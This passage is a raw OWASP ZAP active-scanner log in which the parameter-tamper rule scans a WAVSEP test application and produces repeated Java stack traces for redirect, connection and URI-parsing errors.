org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868762 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Host name may not be null java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5868763 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868974 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5868978 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5869177 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/| at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 5870132 [ZAP-ActiveScanner-1] ERROR org.parosproxy.paros.network.HttpMethodHelper - unsupported protocol: '172.17.0.2' java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.parosproxy.paros.network.HttpMethodHelper.createRequestMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870132 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - host parameter is null java.lang.IllegalArgumentException: host parameter is null at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:206) at org.apache.commons.httpclient.HttpConnection.(HttpConnection.java:155) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionWithReference.(MultiThreadedHttpConnectionManager.java:1145) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$ConnectionPool.createConnection(MultiThreadedHttpConnectionManager.java:762) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.doGetConnection(MultiThreadedHttpConnectionManager.java:476) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager.getConnectionWithTimeout(MultiThreadedHttpConnectionManager.java:416) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870417 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870420 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870428 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870762 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870765 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870774 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5870944 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - ZAP java.net.UnknownHostException: ZAP at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:114) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5871156 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Connection refused java.net.ConnectException: Connection refused at java.net.PlainSocketImpl.socketConnect(Native Method) at java.net.AbstractPlainSocketImpl.doConnect(AbstractPlainSocketImpl.java:339) at java.net.AbstractPlainSocketImpl.connectToAddress(AbstractPlainSocketImpl.java:200) at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:182) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 5871159 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.ascanrules.TestParameterTamper - Invalid authority org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrules.TestParameterTamper.scan(TestParameterTamper.java:137) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at 